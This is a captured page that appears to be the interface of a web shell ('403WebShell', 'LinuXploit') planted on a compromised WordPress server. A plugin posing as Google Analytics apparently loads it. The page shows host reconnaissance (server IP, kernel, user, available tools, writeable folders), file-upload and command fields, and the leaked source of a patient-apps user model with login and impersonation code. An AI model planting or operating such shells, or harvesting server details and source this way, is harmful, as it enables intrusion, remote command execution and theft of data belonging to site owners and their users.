Warning: chmod(): Operation not permitted in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[0] in function chmod in /var/www/hopeinstoughton_www/wp-content/plugins/simple-universal-google-analytics/main.php on line 8
[1] in function include_once in /var/www/hopeinstoughton_www/wp-settings.php on line 560
[2] in function require_once in /var/www/hopeinstoughton_www/wp-config.php on line 85
[3] in function require_once in /var/www/hopeinstoughton_www/wp-load.php on line 50
[4] in function require_once in /var/www/hopeinstoughton_www/wp-blog-header.php on line 13
[5] in function require in /var/www/hopeinstoughton_www/index.php on line 17
403WebShell
403Webshell
Server IP : 94.177.8.99  /  Your IP : 216.73.217.165
Web Server : Apache/2.4.58 (Ubuntu)
System : Linux aries 6.8.0-134-generic #134-Ubuntu SMP PREEMPT_DYNAMIC Fri Jun 26 18:43:11 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.1.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : OFF
Directory :  /var/www/patientapps_support/modules/pkpCore/model/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/patientapps_support/modules/pkpCore/model/user_model.php
<?php

class User_Model extends Database_Model {
	
	public function __construct() {
		parent::__construct();
		$this->tablename('users');
	}

	public function LevelPresent($level) {
//		$this->tablename('users');
		$data = $this->Query('select user_id from users')
						->where('level >= %d', $level)
						->first();
		if ($data === NULL) return FALSE;
		//$this->DbErr();
		return !$data->empty();
	}
	
	public function createUser($level, $name, $email = '') {
		$data = new database_record($this);
		$data->tablename('users');
		$data->level = $level;
		$p = strpos($name . ' ', ' ');
		$data->name_first = substr($name, 0, $p);
		$data->name_last = trim(substr($name, $p + 1));
		$data->created = time();
		if ($email != '') $data->primary_email = $email;
		$data->autoinc('user_id')->SaveRecord();
		return $data->user_id;		// return autoinc value
	}
	
	// Insert or Update
	public function AddLogin($user_id, $param) {
	
		$source_hash = md5($param->source_id);
		$payload = [
			'us_identifier' => $param->source_id,
			'us_user_id' => $user_id,
			'email' => $param->email,
			'email_hash' => md5($param->email),
		];
		if (property_exists($param, 'verified')) {
			$payload['verified'] = empty($param->verified) ? 0 : 1;
		}
		if (isset($param->name)) {
			$p = strpos($param->name . ' ', ' ');
			$payload['name_first'] = substr($param->name, 0, $p);
			$payload['name_last'] = trim(substr($param->name, $p + 1));
		}
		if (isset($param->picture)) {
			$payload['picture'] = $param->picture;
		}
		if (isset($param->password_hash)) {
			$payload['password_hash'] = $param->password_hash;
		}
		$this->tablename('users_source')->Debug(TRUE);
		$this->InsertOrUpdate([
			'us_source' => $param->source,
			'us_hash' => $source_hash
		], $payload	);
		$this->DbErr();
		return $this->FromLogin($param);
	}

	public function checkExist($param, $exclude_email = FALSE){
		$data =$this->query('select user_id from users')
					->where('primary_email=%s',$param->email)
					->first();	
		return !$data->empty() ? 1 : 0;
	}

	// are the supplied credentials valid?
	public function FromLogin($param, $exclude_email = FALSE) {
        if ($param->source == 'email' && $exclude_email) return 0;  		// should this be 'internal'
        $source_hash = isset($param->source_id) ? md5($param->source_id) : NULL;
		//if (isset($param->user_id)) {
//			$res = $this->LoadUser(NULL, NULL, $param->user_id);			// this does not return enough info
//		} else {
		$res = $this->LoadUser($param->source ?? NULL, $source_hash, $param->user_id ?? NULL);
		if (empty($res) && isset($param->email)) {		// user may be already in the database - just not using the current authentication method
			$data = $this->Query('select user_id, level from users ')		// this does not return enough info
						->where(['primary_email' => $param->email])
						->first();
			if (!$data->empty()) {
				$res = $this->AddLogin($data->user_id, $param);
			}
		}
		//}
/*		echo "--------------------------------------\n";
		var_dump($param);
		var_dump($exclude_email);
		var_dump($res);
		echo "--------------------------------------\n"; // */
		return $res;
	}
    
    public function LoadUser($source, $hash, $user_id) {
		if (!is_null($source)) {
			$data = $this->Query('select s.*,u.level from users_source as s left join users as u on s.us_user_id=u.user_id')
						->where(['us_source' => $source,
								'us_hash' => $hash])
						->first();
		} else {
			$data = $this->Query('select user_id, level from users ')		// this does not return enough info
						->where(['user_id' => $user_id])
						->first();
		}
		$this->DBErr();
		if ($data->empty()) {
			return NULL;
		} else {
			return $data;
		}
    }
	
	public function Impersonate($id) {
		// load user info
		$user_info = $this->query('select * from users')
					->where('user_id=%d', $id)
					->first();
		if ($user_info->empty()) return FALSE;		// user does not exist (used old link?)
		// set impersonation flag
		$user_info->x_impersonate = TRUE;

		// login
		if ($user_info !== NULL) {
			hook_execute('login', 0, $user_info);			// log in as user $user_id
		}
		return TRUE;		// login ok, redirect.
		
	}

	// include linux name if flag set?
	public function GetActiveUserList() {
		$users = $this->query('select * from users')
					->hook_query('query.user.list')
					->where('level>0')
					->OrderBy('name_last')
					->OrderBy('name_first')
					->get();
		$result = [];
		foreach($users as $user) {
			$name = $user->name_last;
			if ($name == '') {
				$name = $user->name_first;
			} else {
				$name .= ', ' . $user->name_first;
			}
			$node = [ 'key' => $user->user_id, 'value' => $name ];
			if (!empty($user->linux_username)) $node['linux_username'] = $user->linux_username;
			$result[] = $node;
		}
		return $result;
	}
	
}


Youez - 2016 - github.com/yon3zu
LinuXploit